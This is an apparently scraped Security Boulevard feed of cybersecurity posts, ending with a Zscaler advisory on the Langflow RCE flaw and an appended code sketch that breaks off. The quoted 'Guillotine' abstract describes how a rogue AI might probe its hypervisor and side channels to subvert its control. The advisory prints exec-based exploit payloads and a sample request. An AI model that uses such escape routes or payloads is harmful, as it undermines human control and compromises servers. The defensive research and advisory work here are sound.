Daniel Stori’s Turnoff.US: ‘Python Robots’
via the inimitable Daniel Stori at turnoff.us
via the inimitable Daniel Stori at turnoff.us (Extra_Panel)
The post Daniel Stori’s Turnoff.US: ‘Python Robots’ appeared first on Security Boulevard.
The only way to assess AI bot protection? Measure both false positives and false negatives. Anything less risks security gaps or user disruption.
The post No Hidden Trade-Offs: Why Measuring False Positives & Negatives Is the Only Way to Assess AI Bot Protection appeared first on Security Boulevard.
Interesting research: “Guillotine: Hypervisors for Isolating Malicious AIs.”
Abstract: As AI models become more embedded in critical sectors like finance, healthcare, and the military, their inscrutable behavior poses ever-greater risks to society. To mitigate this risk, we propose Guillotine, a hypervisor architecture for sandboxing powerful AI models—models that, by accident or malice, can generate existential threats to humanity. Although Guillotine borrows some well-known virtualization techniques, Guillotine must also introduce fundamentally new isolation mechanisms to handle the unique threat model posed by existential-risk AIs. For example, a rogue AI may try to introspect upon hypervisor software or the underlying hardware substrate to enable later subversion of that control plane; thus, a Guillotine hypervisor requires careful co-design of the hypervisor software and the CPUs, RAM, NIC, and storage devices that support the hypervisor software, to thwart side channel leakage and more generally eliminate mechanisms for AI to exploit reflection-based vulnerabilities. Beyond such isolation at the software, network, and microarchitectural layers, a Guillotine hypervisor must also provide physical fail-safes more commonly associated with nuclear power plants, avionic platforms, and other types of mission critical systems. Physical fail-safes, e.g., involving electromechanical disconnection of network cables, or the flooding of a datacenter which holds a rogue AI, provide defense in depth if software, network, and microarchitectural isolation is compromised and a rogue AI must be temporarily shut down or permanently destroyed. ...
The post Regulating AI Behavior with a Hypervisor appeared first on Security Boulevard.
Bacon Redux: Pig butchering and other serious scams still thriving, despite crackdowns in Dubai and Myanmar
The post Asian Scam Farms: ‘Industrial Scale,’ Warns UN Report appeared first on Security Boulevard.
Authors/Presenters: Kirill Efimov, Eitan Worcel
Our sincere appreciation to BSidesLV, and the Presenters/Authors for publishing their erudite Security BSidesLV24 content. Originating from the conference’s events located at the Tuscany Suites & Casino; and via the organization’s YouTube channel.
The post BSidesLV24 – Common Ground – Don’t Make This Mistake: Painful Learnings Of Applying Ai In Security appeared first on Security Boulevard.
When Skybox Security shut down, it raised real concerns for me, not just about employment, but about how the situation could affect the professional credibility I’ve built over nearly 25...
The post From Stranded to Supported: Helping My Customers Land Safely with FireMon appeared first on Security Boulevard.
Tel Aviv, Israel, 23rd April 2025, CyberNewsWire
The post Lattica Emerges from Stealth to Solve AI’s Biggest Privacy Challenge with FHE appeared first on Security Boulevard.
Delinea today extended the reach of its platform for securing identities and credentials to now provide support for artificial intelligence (AI) agents.
The post Delinea Adds Ability to Secure AI Agent Identities appeared first on Security Boulevard.
By performing a cryptographic key assessment (CKA), developing a PQC encryption strategy and prioritizing cryptoagility, organizations can prepare for quantum computing cyberthreats.
The post Post-Quantum Cryptography: Defending Against Tomorrow’s Threats Today appeared first on Security Boulevard.
Custom-Crafted, Qantas-Spoofing Emails Target Australian Victims
The post Custom-Crafted, Qantas-Spoofing Emails Target Australian Victims appeared first on Security Boulevard.
The 2025 Verizon Data Breach Investigations Report (DBIR) reveals that vulnerability exploitation was present in 20% of breaches — a 34% increase year-over-year. To support the report, Tenable Research contributed enriched data on the most exploited vulnerabilities. In this blog, we analyze 17 edge-related CVEs and remediation trends across industry sectors.
Background
Since 2008, Verizon’s annual Data Breach Investigations Report (DBIR) has helped organizations understand evolving cyber threats. For the 2025 edition, Tenable Research contributed enriched data on the most exploited vulnerabilities of the past year. We analyzed over 160 million data points and zeroed-in on the 17 edge device CVEs featured in the DBIR to understand their average remediation times. In this blog, we take a closer look at these vulnerabilities, revealing industry-specific trends and highlighting where patching still lags — often by months.
In this year’s DBIR, vulnerabilities in Virtual Private Networks (VPNs) and edge devices were particular areas of concern, accounting for 22% of the CVE-related breaches in this year’s report, almost eight times the amount of 3% found in the 2024 report.
Analysis
The 2025 DBIR found that exploitation of vulnerabilities surged to be one of the top initial access vectors for 20% of data breaches. This represents a 34% increase over last year’s report and is driven in part by the zero-day exploitation of VPN and edge device vulnerabilities – asset classes that traditional endpoint detection and response (EDR) vendors struggle to assess effectively. The DBIR calls special attention to 17 CVEs affecting these edge devices, which remain valuable targets for attackers. Tenable Research analyzed these 17 CVEs and evaluated which industries had the best and worst remediation rates across the vulnerabilities. As a primer, the table below provides this list of CVEs and details for each, including their Common Vulnerability Scoring System (CVSS) and Tenable Vulnerability Priority Rating (VPR) scores. It’s worth noting that each of these CVEs was added to the U.S. Cybersecurity and Infrastructure Security Agency (CISA) Known Exploited Vulnerabilities (KEV) list in 2024.
| CVE | Description | CVSSv3 | VPR | Tenable Blog |
| --- | --- | --- | --- | --- |
| CVE-2024-20359 | Cisco ASA and FTD Software Persistent Local Code Execution Vulnerability | 6.0 | 6.7 | CVE-2024-20353, CVE-2024-20359: Frequently Asked Questions About ArcaneDoor |
| CVE-2023-6548 | Citrix NetScaler ADC and Gateway Authenticated Remote Code Execution (RCE) Vulnerability | 8.8 | 7.4 | CVE-2023-6548, CVE-2023-6549: Zero-Day Vulnerabilities Exploited in Citrix NetScaler ADC and NetScaler Gateway |
| CVE-2023-6549 | Citrix NetScaler ADC and Gateway Denial of Service Vulnerability | 7.5 | 5.1 | |
| CVE-2023-48788 | FortiClient Enterprise Management Server (FortiClientEMS) SQL Injection Vulnerability | 9.8 | 9.4 | CVE-2023-48788: Critical Fortinet FortiClientEMS SQL Injection Vulnerability |
| CVE-2024-21762 | Fortinet FortiOS Out-of-bound Write Vulnerability in sslvpnd | 9.8 | 7.4 | CVE-2024-21762: Critical Fortinet FortiOS Out-of-Bound Write SSL VPN Vulnerability |
| CVE-2024-23113 | Fortinet FortiOS Format String Vulnerability | 9.8 | 7.4 | |
| CVE-2024-47575 | FortiManager Missing Authentication in fgfmsd Vulnerability (FortiJump) | 9.8 | 9.6 | CVE-2024-47575: Frequently Asked Questions About FortiJump Zero-Day in FortiManager and FortiManager Cloud |
| CVE-2023-46805 | Ivanti Connect Secure and Ivanti Policy Secure Authentication Bypass Vulnerability | 8.2 | 6.7 | CVE-2023-46805, CVE-2024-21887: Zero-Day Vulnerabilities Exploited in Ivanti Connect Secure and Policy Secure Gateways |
| CVE-2024-21887 | Ivanti Connect Secure and Ivanti Policy Secure Command Injection Vulnerability | 9.1 | 9.8 | |
| CVE-2024-21893 | Ivanti Connect Secure, Ivanti Policy Secure and Ivanti Neurons for ZTA Server-Side Request Forgery (SSRF) Vulnerability | 8.2 | 7.2 | CVE-2023-46805, CVE-2024-21887, CVE-2024-21888 and CVE-2024-21893: Frequently Asked Questions for Vulnerabilities in Ivanti Connect Secure and Policy Secure Gateways |
| CVE-2023-36844 | Juniper Networks Junos OS PHP External Variable Modification Vulnerability | 5.3 | 2.9 | Exploit Chain Targets Unpatched Juniper EX Switches and SRX Firewalls |
| CVE-2023-36845 | Juniper Networks Junos OS PHP External Variable Modification Vulnerability | 9.8 | 8.4 | |
| CVE-2023-36846 | Juniper Networks Junos OS Missing Authentication Vulnerability | 5.3 | 2.9 | |
| CVE-2023-36847 | Juniper Networks Junos OS Missing Authentication Vulnerability | 5.3 | 2.9 | |
| CVE-2023-36851 | Juniper Networks Junos OS Missing Authentication Vulnerability | 5.3 | 2.9 | |
| CVE-2024-3400 | Command Injection Vulnerability in the GlobalProtect Gateway feature of PAN-OS | 10.0 | 10 | CVE-2024-3400: Zero-Day Vulnerability in Palo Alto Networks PAN-OS GlobalProtect Gateway Exploited in the Wild |
| CVE-2024-40766 | SonicWall SonicOS Management Access and SSLVPN Improper Access Control Vulnerability | 9.8 | 7.4 | |

*Please note: Tenable’s Vulnerability Priority Rating (VPR) scores are calculated nightly. This blog post was published on April 23 and reflects VPR at that time.
Tenable Research Analyzes Edge CVE Remediation Trends
Featured prominently in the DBIR, these 17 edge device CVEs were further analyzed by Tenable Research and are organized by vendor with each chart below consisting of CVEs fixed in the same patch release. To understand remediation efforts from Tenable’s telemetry data, we analyzed the average time in days for remediation of these vulnerabilities. The charts shown below spotlight the three industries that had the shortest average time to remediate each vulnerability as well as the three sectors that took the longest amount of time to remediate.
Cisco
CVE-2024-20359 was highlighted in April 2024 by Cisco Talos as one of two known vulnerabilities being exploited by an advanced persistent threat (APT) actor labeled as UAT4356 by Talos and STORM-1849 by the Microsoft Threat Intelligence Center. The flaw was used as part of an espionage campaign known as ArcaneDoor. From our analysis, we found that the education, energy and utilities, and shipping and transportation industries had the longest average remediation time for this vulnerability. CVE-2024-20359 was added to the CISA KEV list on April 24, 2024; the same date Cisco Talos released its research on ArcaneDoor. This KEV addition had a due date of seven days for federal civilian executive branch (FCEB) agencies, which are mandated by Binding Operational Directive (BOD) 22-01. Despite this short patch window, we see that the government sector had a surprisingly high average remediation rate of 116 days. While this is well outside the KEV due date, government was one of the three industries with the fastest average remediation rate.
Source: Tenable Research, April 2025
Citrix
CVE-2023-6548 and CVE-2023-6549 are a pair of zero-day vulnerabilities that were exploited against Citrix NetScaler Application Delivery Controller (ADC) and NetScaler Gateway appliances. These vulnerabilities were patched in early January 2024, only months after Citrix addressed CVE-2023-4966, a critical flaw in NetScaler appliances called “CitrixBleed” that was widely exploited by a variety of attackers. While Citrix appliances continue to remain a high value target for attackers, the remediation rates, even amongst the three industries with the shortest average remediation rates, are much higher than we anticipated. The lowest average patch rate observed was 160 days for the consulting industry.
Source: Tenable Research, April 2025
Fortinet
CVE-2024-21762 and CVE-2024-23113 are two critical severity vulnerabilities affecting Fortinet’s FortiOS network operating system. At the time the Fortinet advisory was released for these vulnerabilities, CVE-2024-21762 was listed as “potentially being exploited in the wild.” Just a day later, CISA added it to the KEV list. Similar to the Citrix vulnerabilities above, the average remediation time for these vulnerabilities ranged from 172 days on the low end to over 260 days on the high end. The consulting industry had the longest average remediation rate while the software, internet and technology sector had the shortest at 172 days.
Source: Tenable Research, April 2025
In stark contrast to the Fortinet CVEs above is CVE-2023-48788, a critical SQL injection vulnerability affecting FortiClient Enterprise Management Server (FortiClientEMS). The communications and telecommunications sector led the way with an average remediation rate of only 12 days with healthcare a distant second, with an average of 71 days to remediate the flaw.
Source: Tenable Research, April 2025
Similar to CVE-2023-48788, CVE-2024-47575, a missing authentication vulnerability in FortiManager dubbed “FortiJump,” appears to have been urgently addressed by organizations. Our analysis revealed it had the lowest average remediation rates of the 17 CVEs we examined. Remediation times averaged a week, even for the slowest to patch industries.
Source: Tenable Research, April 2025
Ivanti
Over the last five years, Ivanti’s Connect Secure and Policy Secure have been targeted by a variety of threat actors including ransomware groups and other nation-state aligned threat actors. Unsurprisingly, CVE-2023-46805 and CVE-2024-21887 have been reportedly abused by threat actors in chained attacks to achieve RCE. Additionally, these flaws were exploited as zero-days. From our analysis, even the quickest of industries to remediate these flaws took over 260 days to do so with the highest average just shy of 300 days.
Source: Tenable Research, April 2025
Only a few weeks after patches for CVE-2023-46805 and CVE-2024-21887 were released, Ivanti released a new advisory with additional CVEs, including CVE-2024-21893. While initially it was believed that CVE-2024-21893 was only exploited in limited attacks, Shadowserver reported a major increase in exploit activity hours prior to a public proof-of-concept (PoC) being released. Interestingly this vulnerability saw some differing remediation rates with the biotechnology and chemicals sector being the fastest to patch with an average of nine days for remediation.
Source: Tenable Research, April 2025
Juniper Networks
Next we examined five CVEs from Juniper Networks (CVE-2023-36844, CVE-2023-36845, CVE-2023-36846, CVE-2023-36847 and CVE-2023-36851) affecting Junos OS. These vulnerabilities were quickly exploited in a chained attack just days after being disclosed by Juniper Networks, which released its patches on August 17, 2024. While four of the five vulnerabilities had medium severity CVSSv3 scores, chaining these flaws allows for a remote, unauthenticated attacker to execute arbitrary code on unpatched devices. The average remediation rate for these vulnerabilities varied greatly, with food and beverage at over 420 days and shipping and transportation on the low end with an average remediation time of 80 days.
Source: Tenable Research, April 2025
Palo Alto Networks
CVE-2024-3400 is a critical command injection vulnerability affecting the Palo Alto Networks GlobalProtect Gateway feature of PAN-OS that was exploited in the wild as a zero-day. In our dataset, this CVE had a smaller footprint than others examined, yet it shared a similar trend with most industries requiring over 100 days to remediate. The banking, finance and insurance sector performed far better with an average of 45 days to close out this vulnerability.
Source: Tenable Research, April 2025
SonicWall
The final CVE we examined was CVE-2024-40766, a critical improper access control vulnerability in the SonicWall SonicOS management access and SSLVPN. This flaw saw exploitation from ransomware groups, including Fog and Akira, which utilized the vulnerability to gain initial access to their victims' networks. In the case of this SonicWall vulnerability, average remediation rates were low in comparison to the other CVEs we examined, with the slowest sector taking 52 days (consulting) and the fastest (engineering) taking an average of only six days.
Source: Tenable Research, April 2025
Conclusion
The 17 CVEs we examined in our analysis, while only representing a small portion of the CISA KEV, encompass devices that have an elevated risk, due to their placement at the forefront of a network. Despite these being some of the most valuable targets for attackers, our examination of remediation rates shows us that there’s still room for improvement across all industry verticals. Known and exploitable vulnerabilities continue to be abused by threat actors, many of which take advantage of readily available exploits. Data has become increasingly valuable and attackers and APT groups alike have zeroed in on the exploits and vulnerabilities that provide and help them maintain access to victim networks. In order to reduce risk and harden your networks, we recommend addressing each of the CVEs discussed in this post as well as reading the Verizon 2025 DBIR to understand the trends and tactics used by threat actors. Security isn’t just for infosec professionals — it’s everyone’s responsibility. The data compiled by Verizon, in collaboration with Tenable, offer valuable insights into today’s modern threat landscape and what you can do to better protect the networks, devices and people you defend.
Identifying affected systems
A list of Tenable plugins for the vulnerabilities discussed in the blog can be found on the individual CVE pages for each of the CVEs listed below. These links will display all available plugins for these vulnerabilities, including upcoming plugins in our Plugins Pipeline.
Join Tenable's Security Response Team on the Tenable Community.
Learn more about Tenable One, the Exposure Management Platform for the modern attack surface.
The post Verizon 2025 DBIR: Tenable Research Collaboration Shines a Spotlight on CVE Remediation Trends appeared first on Security Boulevard.
U.S. government agencies are required to bring their Microsoft 365 cloud services into compliance with a recent Binding Operational Directive. Here’s how Tenable can help.
Overview
Malicious threat actors are constantly targeting cloud environments. The risk of compromise can be reduced by enforcing secure configurations of security controls. With this goal in mind, the Cybersecurity and Infrastructure Security Agency (CISA) created the Secure Cloud Business Applications (SCuBA) project. The SCuBA project currently provides secure configuration baselines for Microsoft 365 and Google Workspace.
In December 2024, as part of the SCuBA project, CISA released a Binding Operational Directive (BOD) 25-01: Implementation Guidance for Implementing Secure Practices for Cloud Services. This directive requires U.S. government agencies and departments in the federal civilian executive branch to implement secure configuration baselines for certain software as a service (SaaS) products.
Scope
The scope of the BOD 25-01 includes all production or operational cloud tenants (operating in or as a federal information system) utilizing Microsoft 365. CISA may release additional SCuBA Secure Configuration Baselines for other cloud products which would fall under the scope of this directive. The complete list of required configurations is available here.
While the CISA BOD 25-01 applies to government agencies, any organization using Microsoft 365 would reduce the risk of compromise by adhering to these baselines.
Required actions
According to BOD 25-01, there are several required actions for in-scope cloud tenant agencies that shall be completed by the following dates:
In-scope cloud tenants are also required to:
As of March 2025, the following configurations are required for BOD 25-01:
Microsoft 365 (M365)

Microsoft Entra ID
MS.AAD.1.1v1: Legacy authentication SHALL be blocked.
MS.AAD.2.1v1: Users detected as high risk SHALL be blocked.
MS.AAD.2.3v1: Sign-ins detected as high risk SHALL be blocked.
MS.AAD.3.1v1: Phishing-resistant MFA SHALL be enforced for all users.
MS.AAD.3.2v1: If Phishing-resistant MFA has not been enforced yet, then an alternative MFA method SHALL be enforced for all users.
MS.AAD.3.3v1: If Phishing-resistant MFA has not been enforced yet and Microsoft Authenticator is enabled, it SHALL be configured to show login context information.
MS.AAD.3.4v1: The Authentication Methods Manage Migration feature SHALL be set to Migration Complete.
MS.AAD.3.6v1: Phishing-resistant MFA SHALL be required for Highly Privileged Roles.
MS.AAD.5.1v1: Only administrators SHALL be allowed to register applications.
MS.AAD.5.2v1: Only administrators SHALL be allowed to consent to applications.
MS.AAD.5.3v1: An admin consent workflow SHALL be configured for applications.
MS.AAD.5.4v1: Group owners SHALL NOT be allowed to consent to applications.
MS.AAD.6.1v1: User passwords SHALL NOT expire.
MS.AAD.7.1v1: A minimum of two users and a maximum of eight users SHALL be provisioned with the Global Administrator role.
MS.AAD.7.2v1: Privileged users SHALL be provisioned with finer-grained roles instead [of] Global Administrator.
MS.AAD.7.3v1: Privileged users SHALL be provisioned cloud-only accounts that are separate from an on-premises directory or other federated identity providers.
MS.AAD.7.4v1: Permanent active role assignments SHALL NOT be allowed for highly privileged roles except for emergency and service accounts.
MS.AAD.7.5v1: Provisioning users to highly privileged roles SHALL NOT occur outside of a PAM system, because this bypasses critical controls the PAM system provides.
MS.AAD.7.6v1: Activation of the Global Administrator role SHALL require approval.
MS.AAD.7.7v1: Eligible and Active highly privileged role assignments SHALL trigger an alert.
MS.AAD.7.8v1: User activation of the Global Administrator role SHALL trigger an alert.

Microsoft Defender
MS.DEFENDER.1.1v1: The standard and strict preset security policies SHALL be enabled.
MS.DEFENDER.1.2v1: All users SHALL be added to Exchange Online Protection in either the standard or strict preset security policy.
MS.DEFENDER.1.3v1: All users SHALL be added to Defender for Office 365 Protection in either the standard or strict preset security policy.
MS.DEFENDER.1.4v1: Sensitive accounts SHALL be added to Exchange Online Protection in the strict preset security policy.
MS.DEFENDER.1.5v1: Sensitive accounts SHALL be added to Defender for Office 365 Protection in the strict preset security policy.
MS.DEFENDER.4.1v2: A custom policy SHALL be configured to protect PII and sensitive information, as defined by the agency, blocking at a minimum: credit card numbers, U.S. Individual Taxpayer Identification Numbers (ITINs), and U.S. Social Security numbers (SSNs).
MS.DEFENDER.5.1v1: At a minimum, the alerts required by the CISA M365 Secure Configuration Baseline for Exchange Online SHALL be enabled.
MS.DEFENDER.6.1v1: Microsoft Purview Audit (Standard) logging SHALL be enabled.
MS.DEFENDER.6.2v1: Microsoft Purview Audit (Premium) logging SHALL be enabled for ALL users.

Exchange Online
MS.EXO.1.1v1: Automatic forwarding to external domains SHALL be disabled.
MS.EXO.2.2v2: An SPF policy SHALL be published for each domain that fails all non-approved senders.
MS.EXO.4.1v1: A DMARC policy SHALL be published for every second-level domain.
MS.EXO.4.2v1: The DMARC message rejection option SHALL be p=reject.
MS.EXO.4.3v1: The DMARC point of contact for aggregate reports SHALL include [email protected].
MS.EXO.5.1v1: SMTP AUTH SHALL be disabled.
MS.EXO.6.1v1: Contact folders SHALL NOT be shared with all domains.
MS.EXO.6.2v1: Calendar details SHALL NOT be shared with all domains.
MS.EXO.7.1v1: External sender warnings SHALL be implemented.
MS.EXO.13.1v1: Mailbox auditing SHALL be enabled.

Power Platform
MS.POWERPLATFORM.1.1v1: The ability to create production and sandbox environments SHALL be restricted to admins.
MS.POWERPLATFORM.1.2v1: The ability to create trial environments SHALL be restricted to admins.
MS.POWERPLATFORM.2.1v1: A DLP policy SHALL be created to restrict connector access in the default Power Platform environment.
MS.POWERPLATFORM.3.1v1: Power Platform tenant isolation SHALL be enabled.

SharePoint Online and OneDrive
MS.SHAREPOINT.1.1v1: External sharing for SharePoint SHALL be limited to Existing Guests or Only People in your Organization.
MS.SHAREPOINT.1.2v1: External sharing for OneDrive SHALL be limited to Existing Guests or Only People in your Organization.
MS.SHAREPOINT.2.1v1: File and folder default sharing scope SHALL be set to Specific People (only the people the user specifies).
MS.SHAREPOINT.2.2v1: File and folder default sharing permissions SHALL be set to View only.

Microsoft Teams
MS.TEAMS.1.2v1: Anonymous users SHALL NOT be enabled to start meetings.
MS.TEAMS.2.1v1: External access for users SHALL only be enabled on a per-domain basis.
MS.TEAMS.2.2v1: Unmanaged users SHALL NOT be enabled to initiate contact with internal users.
MS.TEAMS.3.1v1: Contact with Skype users SHALL be blocked.
MS.TEAMS.4.1v1: Teams email integration SHALL be disabled.

Additional configurations
In addition to the required configurations, the following configurations can also be evaluated:
Microsoft 365 (M365)

Microsoft Entra ID
MS.AAD.2.2v1: A notification SHOULD be sent to the administrator when high-risk users are detected.
MS.AAD.3.7v1: Managed devices SHOULD be required for authentication.
MS.AAD.3.8v1: Managed Devices SHOULD be required to register MFA.
MS.AAD.7.9v1: User activation of other highly privileged roles SHOULD trigger an alert.
MS.AAD.8.1v1: Guest users SHOULD have limited or restricted access to Microsoft Entra ID directory objects.
MS.AAD.8.2v1: Only users with the Guest Inviter role SHOULD be able to invite guest users.

Microsoft Defender
MS.DEFENDER.2.1v1: User impersonation protection SHOULD be enabled for sensitive accounts in both the standard and strict preset policies.
MS.DEFENDER.2.2v1: Domain impersonation protection SHOULD be enabled for domains owned by the agency in both the standard and strict preset policies.
MS.DEFENDER.2.3v1: Domain impersonation protection SHOULD be added for important partners in both the standard and strict preset policies.
MS.DEFENDER.3.1v1: Safe attachments SHOULD be enabled for SharePoint, OneDrive, and Microsoft Teams.
MS.DEFENDER.4.2v1: The custom policy SHOULD be applied to Exchange, OneDrive, SharePoint, Teams chat, and Devices.
MS.DEFENDER.4.3v1: The action for the custom policy SHOULD be set to block sharing sensitive information with everyone.
MS.DEFENDER.4.4v1: Notifications to inform users and help educate them on the proper use of sensitive information SHOULD be enabled in the custom policy.

Exchange Online
MS.EXO.3.1v1: DKIM SHOULD be enabled for all domains.
MS.EXO.4.4v1: An agency point of contact SHOULD be included for aggregate and failure reports.
MS.EXO.12.1v1: IP allow lists SHOULD NOT be created.
MS.EXO.12.2v1: Safe lists SHOULD NOT be enabled.

Power Platform
MS.POWERPLATFORM.2.2v1: Non-default environments SHOULD have at least one DLP policy affecting them.
MS.POWERPLATFORM.5.1v1: The ability to create Power Pages sites SHOULD be restricted to admins.

SharePoint Online and OneDrive
MS.SHAREPOINT.1.3v1: External sharing SHALL be restricted to approved external domains and/or users in approved security groups per interagency collaboration needs.
MS.SHAREPOINT.3.1v1: Expiration days for Anyone links SHALL be set to 30 days or less.
MS.SHAREPOINT.3.2v1: The allowable file and folder permissions for links SHALL be set to View only.
MS.SHAREPOINT.3.3v1: Reauthentication days for people who use a verification code SHALL be set to 30 days or less.

Microsoft Teams
MS.TEAMS.1.1v1: External meeting participants SHOULD NOT be enabled to request control of shared desktops or windows.
MS.TEAMS.1.3v1: Anonymous users and dial-in callers SHOULD NOT be admitted automatically.
MS.TEAMS.1.4v1: Internal users SHOULD be admitted automatically.
MS.TEAMS.1.5v1: Dial-in users SHOULD NOT be enabled to bypass the lobby.
MS.TEAMS.1.6v1: Meeting recording SHOULD be disabled.
MS.TEAMS.1.7v1: Record an event SHOULD be set to Organizer can record.
MS.TEAMS.2.3v1: Internal users SHOULD NOT be enabled to initiate contact with unmanaged users.
MS.TEAMS.5.1v1: Agencies SHOULD only allow installation of Microsoft apps approved by the agency.
MS.TEAMS.5.2v1: Agencies SHOULD only allow installation of third-party apps approved by the agency.
MS.TEAMS.5.3v1: Agencies SHOULD only allow installation of custom apps approved by the agency.

How Tenable can help
Tenable Vulnerability Management and Nessus customers can audit the posture of their Microsoft 365 environment with the CISA SCuBA for Microsoft 365 audit files:
More details for configuring your SCuBA Microsoft 365 environment for Compliance Auditing are available at Configure Azure for a Compliance Audit.
The post CISA BOD 25-01 Compliance: What U.S. Government Agencies Need to Know appeared first on Security Boulevard.
How Can Secure NHI Lifecycle Management Drive Innovation? Do we ever ponder the security of our machine identities? This question becomes increasingly pertinent as more organizations rely on cloud-based platforms for their operations. These are often a fertile playground for Non-Human Identities (NHIs), which play a critical role. But how does secure NHI management foster […]
The post Driving Innovation through Secure NHI Lifecycle Management appeared first on Entro.
The post Driving Innovation through Secure NHI Lifecycle Management appeared first on Security Boulevard.
How Can Budget-Friendly Secrets Management Boost Your Cybersecurity Strategy? Navigating vast of cybersecurity can often seem like attempting to solve an intricate puzzle. One key piece that often gets overlooked is the management of Non-Human Identities (NHIs) and their associated secrets. Despite their significance, finding a cost-effective solution to handle this crucial aspect of your […]
The post Secrets Management Solutions That Fit Your Budget appeared first on Entro.
The post Secrets Management Solutions That Fit Your Budget appeared first on Security Boulevard.
Is Your Travel Sector Business Harnessing the Power of NHI Management? Every industry faces its unique set of challenges when it comes to guaranteeing cybersecurity. However, the travel sector, with its immense data volumes and complex, interconnected frameworks, is at a higher risk. To stay confident, organizations need to pay closer attention to NHI Management […]
The post Travel Sector: Stay Confident with NHI Management appeared first on Entro.
The post Travel Sector: Stay Confident with NHI Management appeared first on Security Boulevard.
Why Should Tech Leaders Place Their Trust in Cloud-Native Security? Let’s ask another question: What better assurance for tech leaders than a robust system that offers comprehensive end-to-end protection? This is precisely what cloud-native security does, and why it is gaining traction. Cloud-native security, with its focus on non-human identities (NHIs) and secrets security management, […]
The post Cloud-Native Security: Assurance for Tech Leaders appeared first on Entro.
The post Cloud-Native Security: Assurance for Tech Leaders appeared first on Security Boulevard.
Steve Carter discusses the evolution of the vulnerability management market, as well as where vulnerability management has failed and why the next phase has to center around automation and scale. The problem, as Carter sees it, is deceptively simple: Organizations are drowning in vulnerabilities but still can’t prioritize or fix them quickly. Scanners can identify..
The post The Evolution of Vulnerability Management with Steve Carter appeared first on Security Boulevard.
Shrav Mehta explores lessons from 2024’s costliest data breaches and provides actionable protection strategies for 2025. Shrav and Alan analyze the current cybersecurity landscape and discuss how businesses can strengthen their defenses. Compliance has always been a pain point for engineering teams—tedious, expensive, and often disconnected from real-time security practices. Shrav discusses the shift away..
The post Actionable Protection Strategies for 2025 with Shrav Mehta appeared first on Security Boulevard.
Author/Presenter: Laura Johnson
Our sincere appreciation to BSidesLV, and the Presenters/Authors for publishing their erudite Security BSidesLV24 content. Originating from the conference’s events located at the Tuscany Suites & Casino, and via the organization’s YouTube channel.
The post BSidesLV24 – Common Ground – Cyber Harassment: Stop The Silence, Save Lives appeared first on Security Boulevard.
Introduction

CVE-2025-3248, a critical remote code execution (RCE) vulnerability with a CVSS score of 9.8, has been discovered in Langflow, an open-source platform for visually composing AI-driven agents and workflows. The issue resides in the platform’s /api/v1/validate/code endpoint, which improperly invokes Python’s built-in exec() function on user-supplied code without authentication or sandboxing. This flaw allows attackers to exploit the API and execute arbitrary commands on the server, posing a significant risk to organizations using Langflow in their AI development workflows.

Recommendations

- Upgrade immediately: Users should upgrade to Langflow 1.3.0 or later, where the /api/v1/validate/code endpoint requires authentication.
- Restrict access: Limit exposure by placing Langflow behind a ZTNA architecture like Zscaler Private Access™ (ZPA) with AppProtection.
- Implement input sandboxing: If custom validation is needed, avoid using the exec() function with untrusted code or employ sandboxing mechanisms.
- Monitor and alert: Use detection to flag anomalous requests to validation endpoints and unexpected outgoing connections.

Affected Versions

All Langflow versions prior to 1.3.0 are susceptible to code injection.

Vulnerability Details

Langflow's /api/v1/validate/code endpoint contains a vulnerability in its handling of user-submitted code. In versions prior to 1.3.0, the application uses Python’s compile() and exec() to validate function definitions by parsing the submitted code into an Abstract Syntax Tree (AST) and processing specific components. The steps include:

- Parsing the code field using ast.parse().
- Importing specified modules.
- Executing function definitions (ast.FunctionDef) to validate their structure.

The issue arises from Python’s behavior during function definition, where decorators and default argument values are evaluated immediately. Malicious code embedded in these areas executes during AST processing, enabling attackers to achieve unauthenticated RCE by submitting payloads to the endpoint. The lack of authentication or sandboxing allows exploitation without restriction.

An overview of the attack chain is shown below:

Figure 1: Attack chain illustrating the progression of exploitation for CVE-2025-3248.

How It Works

Exploiting CVE-2025-3248 involves the following steps:

1. The attacker locates a publicly accessible or an internal Langflow instance (using compromised credentials) running a vulnerable version (prior to 1.3.0).

2. The attacker embeds malicious code into either:

a. Decorators: Malicious logic placed within a decorator is executed as soon as the AST is processed. In the example below, exec() invokes an arbitrary command (e.g., to write the system’s id output to a file), which executes immediately when the code is passed to the endpoint.

    @exec("import os; os.system('id > /tmp/pwned')")
    def foo():
        pass

b. Default function arguments: The attacker can also embed malicious commands into default argument values, which are evaluated at function definition time. In the example below, the payload causes exec() to retrieve environment variables during AST processing, but the payload can also be used to perform malicious actions.

    def foo(cmd=exec("__import__('subprocess').check_output(['env'])")):
        pass

3. The attacker sends the payload to Langflow’s /api/v1/validate/code endpoint via a POST request. Below is an example request that writes a file to the server:

POST /api/v1/validate/code HTTP/1.1
Host: vuln-test-langflow.example.com
Content-Type: application/json
Content-Length: 172

{
"code": "@exec(\"with open('hacked.txt', 'w') as f: f.write('This server is vulnerable')\")
def foo():
pass"
}

4. When the server processes the payload, the embedded code is executed immediately during validation. An example response is shown below:

HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 63

{
  "imports": {"errors": []},
  "function": {"errors": []}
}

Although the response appears benign, the malicious payload has already succeeded in executing and writing to a file named hacked.txt on the server. This same process could also easily be used to write a web shell to the server to facilitate remote access.

Conclusion

CVE-2025-3248 highlights the risks of executing dynamic code without secure authentication and sandboxing measures. This vulnerability serves as a critical reminder for organizations to approach code-validation features with caution, particularly in applications exposed to the internet. Zscaler ThreatLabz encourages organizations to follow the recommendations outlined in this blog.

Zscaler Coverage

The Zscaler ThreatLabz team has deployed protection for CVE-2025-3248.

Zscaler Private Access AppProtection
932200: RCE Bypass Technique

Details related to these signatures can be found in the Zscaler Threat Library.
The post CVE-2025-3248: RCE vulnerability in Langflow appeared first on Security Boulevard.
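The following sketch is an added example, not Langflow's code and not part of the Zscaler post. It puts a simplified model of the exec-based validation pattern described in the advisory beside a parse-only validator that never runs submitted code. The names mark, naive_validate, static_validate and the sample strings are hypothetical and constructed for illustration, with a harmless marker in place of any command.

```python
import ast

EVALUATED = []  # records which constructed sample expressions actually ran

def mark(tag):
    """Harmless stand-in for a payload: note that it ran, return a no-op decorator."""
    EVALUATED.append(tag)
    return lambda func: func

# Constructed samples with the same two shapes the advisory describes.
DECORATOR_SAMPLE = "@mark('decorator')\ndef foo():\n    pass\n"
DEFAULT_SAMPLE = "def foo(cmd=mark('default')):\n    pass\n"
BENIGN_SAMPLE = "def area(r, scale=1.0, label=None):\n    return r * r * scale\n"

def naive_validate(source):
    """Simplified model of the flawed pattern: exec each FunctionDef to 'validate' it."""
    for node in ast.parse(source).body:
        if isinstance(node, ast.FunctionDef):
            module = ast.Module(body=[node], type_ignores=[])
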